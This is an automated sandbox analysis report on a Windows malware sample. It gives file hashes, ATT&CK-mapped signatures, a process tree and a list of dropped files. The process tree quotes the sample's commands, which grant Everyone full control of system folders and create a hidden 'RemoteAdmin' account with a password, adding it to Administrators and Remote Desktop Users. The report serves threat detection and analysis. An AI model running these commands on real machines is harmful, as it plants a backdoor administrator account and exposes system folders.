Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    25/08/2024, 10:10

General

  • Target

    c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe

  • Size

    854KB

  • MD5

    c0822b0d14b651b6e1c018c8c0bca9d2

  • SHA1

    424d410d3daa2f3b5cfe5cc369f7eee654c042ba

  • SHA256

    a4a71e8143d4c321322829a9e0b84eff48327bdc39fc3f0a8c56263f153d17d3

  • SHA512

    d4a45f060923c15641bd0588a4799659511dffb8998943514a7388d340267824bbc9f8bd93a30ef139364a1048d65c773c5f2a3aabad23519130363827b1337f

  • SSDEEP

    12288:AraepSMZpe26zfs25lRL0Ktu9w4xW7tI4m7kbchfide0sHTkz21ITCqE38AExV:aZwr26jNLeeClWQAU6eKz2COqaF0

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

    Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

  • Indicator Removal: Network Share Connection Removal 1 TTPs 2 IoCs

    Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 37 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops desktop.ini file(s) 2 IoCs
  • Modifies WinLogon 2 TTPs 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2712
    • C:\Users\Admin\AppData\Local\Temp\tzuP.exe
      tzuP.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2820
      • C:\Users\Admin\AppData\Local\Temp\Compress0\desktop.exe
        "C:\Users\Admin\AppData\Local\Temp\Compress0\desktop.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • Drops desktop.ini file(s)
        • Drops file in System32 directory
        • Drops file in Program Files directory
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3032
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c echo y| CACLS C:\Windows\spool /G Everyone:f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:572
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo y"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1336
          • C:\Windows\SysWOW64\cacls.exe
            CACLS C:\Windows\spool /G Everyone:f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2140
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c echo y| CACLS C:\PROGRA~1\ACCESS~1\Common /G Everyone:f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2932
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo y"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:764
          • C:\Windows\SysWOW64\cacls.exe
            CACLS C:\PROGRA~1\ACCESS~1\Common /G Everyone:f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2092
        • C:\Windows\spool\cmss.exe
          C:\Windows\spool\cmss.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • Modifies WinLogon
          • Hide Artifacts: Hidden Users
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          PID:2144
          • C:\Windows\spool\lsass.exe
            C:\Windows\spool\lsass.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:2248
          • C:\Windows\msn.exe
            C:\Windows\msn.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:2120
          • C:\Windows\spool\lsass.exe
            C:\Windows\spool\lsass.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:2100
          • C:\Windows\SysWOW64\net.exe
            net user RemoteAdmin ecotopia /add
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2300
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 user RemoteAdmin ecotopia /add
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1800
          • C:\Windows\SysWOW64\net.exe
            net localgroup Administrators /Add RemoteAdmin
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2032
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 localgroup Administrators /Add RemoteAdmin
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1432
          • C:\Windows\SysWOW64\net.exe
            net localgroup users /Delete RemoteAdmin
            5⤵
            • Indicator Removal: Network Share Connection Removal
            • System Location Discovery: System Language Discovery
            PID:964
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 localgroup users /Delete RemoteAdmin
              6⤵
              • Indicator Removal: Network Share Connection Removal
              • System Location Discovery: System Language Discovery
              PID:384
          • C:\Windows\SysWOW64\net.exe
            net localgroup "Remote Desktop Users" /Add RemoteAdmin
            5⤵
            • Remote Service Session Hijacking: RDP Hijacking
            • System Location Discovery: System Language Discovery
            PID:1896
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 localgroup "Remote Desktop Users" /Add RemoteAdmin
              6⤵
              • Remote Service Session Hijacking: RDP Hijacking
              • System Location Discovery: System Language Discovery
              PID:556
        • C:\Windows\msn.exe
          C:\Windows\msn.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of SetWindowsHookEx
          PID:1352
          • C:\Windows\spool\lsass.exe
            C:\Windows\spool\lsass.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:2252
          • C:\Windows\spool\cmss.exe
            C:\Windows\spool\cmss.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:2072
        • C:\Windows\spool\lsass.exe
          C:\Windows\spool\lsass.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:2236

Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Program Files\Accessories\Common\clog.txt

          Filesize

          198B

          MD5

          fceb994bd3c60029331a22a53c19871b

          SHA1

          e9bd26049ba5b4bfdea8c8e0051ad37250d870c0

          SHA256

          37ccab91655a12090dcecbcbc77f6457e2e15d50a04bcd46b90243cc356062f4

          SHA512

          34769839b935372be642d19f029f87d5e7f9e5effbdd447d488840c07dc9e86d58cc3dd6bfd3f46af737a902f6cf33b39c048c68299314a42fd03dcbee0c4fc6

        • C:\Users\Admin\AppData\Local\Temp\Compress0\MSWINSCK.OCX

          Filesize

          106KB

          MD5

          3d8fd62d17a44221e07d5c535950449b

          SHA1

          6c9d2ecdd7c2d1b9660d342e2b95a82229486d27

          SHA256

          eba048e3a9cb11671d0e3c5a0b243b304d421762361fe24fd5ea08cb66704b09

          SHA512

          501e22a0f99e18f6405356184506bc5849adc2c1df3bdee71f2b4514ab0e3e36673b4aecbd615d24ebb4be5a28570b2a6f80bd52331edb658f7a5f5a9d686d10

        • C:\Users\Admin\AppData\Local\Temp\Compress0\dunin.dll

          Filesize

          2B

          MD5

          9bf31c7ff062936a96d3c8bd1f8f2ff3

          SHA1

          f1abd670358e036c31296e66b3b66c382ac00812

          SHA256

          e629fa6598d732768f7c726b4b621285f9c3b85303900aa912017db7617d8bdb

          SHA512

          9a6398cffc55ade35b39f1e41cf46c7c491744961853ff9571d09abb55a78976f72c34cd7a8787674efa1c226eaa2494dbd0a133169c9e4e2369a7d2d02de31a

        • C:\Users\Admin\AppData\Local\Temp\Compress0\ftpa.dll

          Filesize

          5B

          MD5

          32af4302da238b64605ef49f872aad21

          SHA1

          f97aaba396dbbbc143acd751cdf72150fe85f798

          SHA256

          d66928953a2c09d957b49ec0498550349b2f82a0f1d73931aeb39c9bff1e0dc3

          SHA512

          22637137df12b596714a211dfbff022ca42142b4104068b4326511f84fe091e30ae66060be715a5be9fe59313c24e64ae99655a78ef00df8287091dc24484f27

        • C:\Users\Admin\AppData\Local\Temp\Compress0\ftps.dll

          Filesize

          9B

          MD5

          17cc45731514eb956c6ec43ca4dd2a71

          SHA1

          487eaf8d52177e51dbefee855c4d9682f39c7ae1

          SHA256

          116a593de27f51a4372ab3fff36b69f44f5394771fa6a8edd7a5dbd201bf3a2d

          SHA512

          9f4645a4902f2b607dea3c9c2fa4a0784d275e432c3279096d3295fcfa4a4d157ee09040f2e44f7ffa16db18d9f6e09f34ecda4d0a74301d390252de2abf1fd7

        • C:\Users\Admin\AppData\Local\Temp\Compress0\ftsv.dll

          Filesize

          17B

          MD5

          b2bf8db5e80efb9d58528b6264fdf086

          SHA1

          550df9d3b6f15afc80832ff2551f60938c1b4a63

          SHA256

          ccf1724ba72944874962927afe1b7a216adbaba3dca1b38730cdeacb133088ed

          SHA512

          a496dd4a93a85bf5de100ec5d17afaed496d4e2526ba6a3f1d09da593d4b8aad85834924561877a90c9762e919bb3b87d7236389e8439c6fd21b838521c86f2a

        • C:\Users\Admin\AppData\Local\Temp\Compress0\ftus.dll

          Filesize

          13B

          MD5

          df7afd56b057ac5894d080b5044b2dbd

          SHA1

          de45d927ec0cae7991cb24e0f0cd3012e1357fcd

          SHA256

          30f2daeec172c264f54892c9ef28f1f72a980f55167aa3ce39894b5602924ec7

          SHA512

          3a9d2c62b04a2dd73ee6b0de49f547ea5be61541d30222a26b2550d2909dad340067ebbf97d1eb04d56f974af9bde409b66fbf7399d2b7448e67b52f8b15e814

        • C:\Users\Admin\AppData\Local\Temp\Compress0\hpreg.dll

          Filesize

          176KB

          MD5

          a0ce0247d48fecaac607edb1e2d87fd8

          SHA1

          346bf586bdf6ae4181c685fa74adf4524328d469

          SHA256

          5a0b1c4e5d91fd67a1ad23e5ce869899b79a7282cb6e5533dc5c074eb59306ec

          SHA512

          38a03530dfafe3030ece87dad7af28baff8e79f87618f1510bcb5b7f994632745dc70f9062ba6bdbcd408062786bbb3c37a53c21423d1f172663d9e57c232986

        • C:\Users\Admin\AppData\Local\Temp\Compress0\inmsg.dll

          Filesize

          40B

          MD5

          62158ca606dfd1b74f03b03f43e597c4

          SHA1

          f91a0aaaa72c124282fd28dbd9326072f789f19f

          SHA256

          4f45cc3a4c63bbd0e99ede09409dd656575c3bf68da68f1af11c01f1a3015d00

          SHA512

          389095d037013a09cb02d6d1fcc65d7f37ab86c82aa63600fba375376b0d3cc317b7bd984abcd325154c132823216d1134a303ab90cd96f8e5b7b836d68315f4

        • C:\Users\Admin\AppData\Local\Temp\Compress0\inter.dll

          Filesize

          1B

          MD5

          c4ca4238a0b923820dcc509a6f75849b

          SHA1

          356a192b7913b04c54574d18c28d46e6395428ab

          SHA256

          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

          SHA512

          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

        • C:\Users\Admin\AppData\Local\Temp\Compress0\mail.dll

          Filesize

          16B

          MD5

          850ef2569cad0612b4e2180f45428a80

          SHA1

          4f1133590e98a1be80bcc5604d9a982c52f627cf

          SHA256

          85fda0b7ca19d9f836076c421de754503f7c1867ab56e58691901ce2d7f7f1e6

          SHA512

          1638a4f01ac56cc660acc123f68eb4161fbff770e26cdf378371f35d51f6eafb1eda963dcb7ec15b00f9b3c013e458fa9fe18f42fa3b490af5e8480e92126bd4

        • C:\Users\Admin\AppData\Local\Temp\Compress0\msn.exe

          Filesize

          108KB

          MD5

          01faeac794a0bea918b8bf9e1af674e6

          SHA1

          73aa0e774ea044950fc72c6a169f64d137df54a2

          SHA256

          bd1b7a67ddf481227ed7ebf17b7b6512f9926a5e69f16e17575d18fa9312a417

          SHA512

          a0a4e0d5da4e06582aefbbf33ebeed88a3ede6efc2987ab75fadb45d4eebef45a957d63820de55a4191897bbef7fe8ad50db8f6f91b8ceb30b037d2ff2613de0

        • C:\Users\Admin\AppData\Local\Temp\Compress0\oem.dll

          Filesize

          1B

          MD5

          cfcd208495d565ef66e7dff9f98764da

          SHA1

          b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

          SHA256

          5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

          SHA512

          31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

        • C:\Users\Admin\AppData\Local\Temp\Compress0\port.dll

          Filesize

          3B

          MD5

          13f3cf8c531952d72e5847c4183e6910

          SHA1

          ac3e7b007d7ab0ba379faa8ab62d9da35c5444f4

          SHA256

          6d05621ab7cb7b4fb796ca2ffbe1a141e0d4319d3deb6a05322b9de85d69b923

          SHA512

          c2b37e4037631aaa4809e9a0dc82ad5ce7a04fa98a6b6de280d16181dc88de0b3e337a96a7aac19619ac65d68537dbe171b3857a72344a1a9d74bd3923460854

        • C:\Users\Admin\AppData\Local\Temp\Compress0\pwhost.dll

          Filesize

          4B

          MD5

          334c4a4c42fdb79d7ebc3e73b517e6f8

          SHA1

          71f8e7976e4cbc4561c9d62fb283e7f788202acb

          SHA256

          140bedbf9c3f6d56a9846d2ba7088798683f4da0c248231336e6a05679e4fdfe

          SHA512

          ab93a9e95d70edb06025511cea4e2b8047fb7e1deaf7244fc0d3edf5e7cb57d8fb7b951bdeb3c6b552714878749eb19b9103e64a83635e8885c7d3e1d0fc5649

        • C:\Users\Admin\AppData\Local\Temp\Compress0\refsdm.dll

          Filesize

          26B

          MD5

          30de44c2337b14e283e1f5de808e7721

          SHA1

          9364673c62a2f270fc400c746c75843f0ed919ab

          SHA256

          3def9d36316debb39167d384f0810bc64ec0ba870019a6f844b5b22dfd0c288a

          SHA512

          13b3b29cfb25ab77ed4542b1a78c475206eb758da3f209a2ed43db19561d4abeac35146f8880aebf0877f4dc3d6603c64457c0e3d8494cbdacc9bd45c8d68f96

        • C:\Users\Admin\AppData\Local\Temp\Compress0\resu.dll

          Filesize

          6B

          MD5

          79018b9d50483943a7891102073558e1

          SHA1

          e227bd10a8cb3fcc9ef3cc62be8b0785abfc4ad5

          SHA256

          bf511643f9ac25c6d6ec61e0af29cb561a0e6cdcd8afef273ab9fd2523f69cd5

          SHA512

          ddedf00256733686bdcc74a9670db5aaa85a10c4addd99ea540fd08bc5b1f01803c609047f5d3e57adf0684afdd44a89311686b3089ab00db98efa54248856e2

        • C:\Users\Admin\AppData\Local\Temp\Compress0\rvhost.dll

          Filesize

          5B

          MD5

          34c4c50fc7bdd0394f3954f73f2be34d

          SHA1

          9f537f977fa2ecd1f91ff057ce1667e98ab04729

          SHA256

          c226b0485361a7d12f677de5fd6d094fce775723bed9f5cb44000056b45636fc

          SHA512

          eda815d970711a13f2ae66ccee2e4752689e0f2c8e08d9162533e5eaadc08bd201e3e545f4c8806216eb3f775656f1c3ab9a8210bbecb29a5541e5c8284f9e21

        • C:\Users\Admin\AppData\Local\Temp\Compress0\rvport.dll

          Filesize

          7B

          MD5

          7a1920d61156abc05a60135aefe8bc67

          SHA1

          808d7dca8a74d84af27a2d6602c3d786de45fe1e

          SHA256

          21b111cbfe6e8fca2d181c43f53ad548b22e38aca955b9824706a504b0a07a2d

          SHA512

          94abfc7b11f4311e8e279b580907fefc1118690479fb7e13f0c22ade816bc2b63346498833b0241eec2b09e15172e13027dc85024bacb7bc40c150f4131f7292

        • C:\Users\Admin\AppData\Local\Temp\Compress0\rwci.dll

          Filesize

          5B

          MD5

          3f74a886c7f841699690962c497d4f30

          SHA1

          271593a69439c052d4de63e50c569060dcd78e91

          SHA256

          d4c999ae43633bd2036188d2bca68e1be8202b2cc1f3a1c42a728eaff7d2483d

          SHA512

          72d7eb167391c298ee40fbf1ae613958e9c27fdca27f3256620e9c70ba37a6dabcf43c7fa1538609c555e0f686a48f04842b6ac308f306f9da51f4ca3a6ef1e8

        • C:\Users\Admin\AppData\Local\Temp\Compress0\rwcs.dll

          Filesize

          3B

          MD5

          045117b0e0a11a242b9765e79cbf113f

          SHA1

          ec7f1f65067126f3b2bd1037de8a18d0db2ec84b

          SHA256

          7b69759630f869f2723875f873935fed29d2d12b10ef763c1c33b8e0004cb405

          SHA512

          1f748a9c15bdf0a5e3be241ac0b8ef75e4c0c339e9550c9f8fa342778c620ac88de6edd42b61398e72bea045b27649ef7992ae5ed0e0b162cd9f1aa71686a222

        • C:\Users\Admin\AppData\Local\Temp\Compress0\scint.dll

          Filesize

          2B

          MD5

          d3d9446802a44259755d38e6d163e820

          SHA1

          b1d5781111d84f7b3fe45a0852e59758cd7a87e5

          SHA256

          4a44dc15364204a80fe80e9039455cc1608281820fe2b24f1e5233ade6af1dd5

          SHA512

          3c11e4f316c956a27655902dc1a19b925b8887d59eff791eea63edc8a05454ec594d5eb0f40ae151df87acd6e101761ecc5bb0d3b829bf3a85f5432493b22f37

        • C:\Users\Admin\AppData\Local\Temp\Compress0\scloc.dll

          Filesize

          36B

          MD5

          0af629b1df207fd25f221a50059140a5

          SHA1

          1bdf9311af713c98ef038fcf89ee678884e8fb3d

          SHA256

          5d795ca75d4e40986ae410a8063f6a23a3cb1e6b2456bea570e5247ced6d9177

          SHA512

          7531d36dac630adc84e88cd75cddc3e92e23b89ddbc4994780693772a106878879a9b0a458f96262ad2df01dc5ef0c641a9c1a21dfe75b4e43a14ad37a2244b7

        • C:\Users\Admin\AppData\Local\Temp\Compress0\services.exe

          Filesize

          168KB

          MD5

          dff48c59b7a55eea69f81b2642d852ca

          SHA1

          c9ce26516a5cf95c3f54297aa2dc9dc91e69f7c1

          SHA256

          a3809af3f27da2c16f2b77f2d87faf4399375eca2ff7130c9c4891dc79c8ce55

          SHA512

          3b24d159eb652b42942250dec0881016fe99a0c61c5cb26c925828568cb1a4557bd93d91e8efd3d68c1badb178325057221bfd2eccd5caa682ff6c76b703223b

        • C:\Users\Admin\AppData\Local\Temp\Compress0\ssap.dll

          Filesize

          9B

          MD5

          e3a7a7ade9b32f5de04970e3111289f2

          SHA1

          db6023ca7df49c86894d30a6789e8ddea24afba8

          SHA256

          9a5b2200baf3be5073eca02a71d0157138190ff5ab097aca02951120651ae321

          SHA512

          e746c5cabf138422fb3c699bd5275b419c106eae189a532c4e2f553e6a763b46519a26828f28a4b31d7511dde5cf5266e1f4d12e1a5eebb30bdd3a3f637b93a3

        • C:\Users\Admin\AppData\Local\Temp\Compress0\type.dll

          Filesize

          7B

          MD5

          c3eef34d092ed60c3b2791814511903a

          SHA1

          815f979888d7a7d3cb622eee67d445c0fc94469b

          SHA256

          6bd1454e4848ba9ec48363db5afdc51f2a67b2e87bf7478b681cda2df245779a

          SHA512

          519b141185f3b4dcaf0990844aa125a23caa552d347fa69972ecf565b08b82d6b0fad321ebc0bbacca06b36fa603f4d8bd080a5a9b760e4405199b57082190ec

        • C:\Users\Admin\AppData\Local\Temp\Compress0\unir.exe

          Filesize

          36KB

          MD5

          776ef97f5d72fb916946016f11054ef1

          SHA1

          b92105a2b50f402f1684b6bb4d61d60d94d39a3d

          SHA256

          b6441da69e2709be96db9261e016229b3c18fd9d444126a89152b2002eb61530

          SHA512

          9750200e8d0a048408b0f9c2bac6fddd97ae8a312de955d43b9e49db6a7e378f7809014a72e19ace8cd2141af079e44d3e3de12781d7deb9e680fa9d3d5be30f

        • C:\Users\Admin\AppData\Local\Temp\Compress0\user.dll

          Filesize

          3B

          MD5

          276b6c4692e78d4799c12ada515bc3e4

          SHA1

          72019bbac0b3dac88beac9ddfef0ca808919104f

          SHA256

          24d4b96f58da6d4a8512313bbd02a28ebf0ca95dec6e4c86ef78ce7f01e788ac

          SHA512

          40c41475561375aa28d4d035445525f0e8f6bfaba1fdb4bc0c30dec2de112d7c7df168bdced38b4d87326b4c3f226c2ba1a09f4384451b0bc5f9c108c1c1df32

        • C:\Users\Admin\AppData\Local\Temp\Compress0\winsyst32.exe

          Filesize

          232KB

          MD5

          e502320ee741245f42d3c28982c93897

          SHA1

          b25015e41af91a19cc6bbdcca227f657f9b29540

          SHA256

          c394b72246f8e1bf35014a03756a97deaba87fbb07fe25e45c88412a36d05d68

          SHA512

          65650e57de8f7a425e93b63b16eca4ed3011b6054274d2ea97f974a6479c62c68e65d3fc26e3596fa9cff44090dbd764204f34d0b86e7bed020716905d5ac9b6

        • C:\Users\Admin\AppData\Local\Temp\Compress0\ziplog.txt

          Filesize

          5KB

          MD5

          c16945c3b38f0eea5981cbc04ef94b30

          SHA1

          d667fdcb9205b71a23daf59f65e0afe7a4f37860

          SHA256

          32e0bfc325f10c1012f4ee92d415517aa7d199cb35ebedfd006b05baad7682b5

          SHA512

          686c24439e76a227b60b91e54f7b77aa55f96c41d6d02822847612d3667e93a780c481e346c2348df00e5370d0b7f329e71639422706e4008c51b1e8f7b43bec

        • \Users\Admin\AppData\Local\Temp\Compress0\desktop.exe

          Filesize

          56KB

          MD5

          76f8154e4981426d4928cdf4a673fa74

          SHA1

          261af6de802a67017392841546d9b89b9a6127ed

          SHA256

          ebc4cb98eb90b7a6e9c143b57b411eab4abb1c854e4673136c0d51bcba2fa930

          SHA512

          bd350912a87e41ed8e0fdc2bc9b8be73883f6307975667423f4cde32db69ed74ba1639ed9e92cb658a6f784947b562f0e05a974204e4183e68fdea88767533b4

        • \Users\Admin\AppData\Local\Temp\tzuP.exe

          Filesize

          375KB

          MD5

          fb7a859807257aa10ebe35ebd0942911

          SHA1

          499e645041348edca4c1d3c63709325f369dee27

          SHA256

          f337c1107ba8a9df8dc1a347e53791cf389ab16c7b409edb0278ec624d594b1b

          SHA512

          ca33119ef0a9cb34841ec227c4fd259e9c843ec37f7f2d40ef3d42a93059eb09a24396eb1f1b3732c9a4e5afdc69211f4d9e96d446482c4da647ca100718ea4b

        • memory/2144-188-0x0000000060000000-0x000000006002E000-memory.dmp

          Filesize

          184KB

        • memory/2712-1-0x0000000000220000-0x0000000000221000-memory.dmp

          Filesize

          4KB

        • memory/2712-153-0x0000000042050000-0x000000004212C000-memory.dmp

          Filesize

          880KB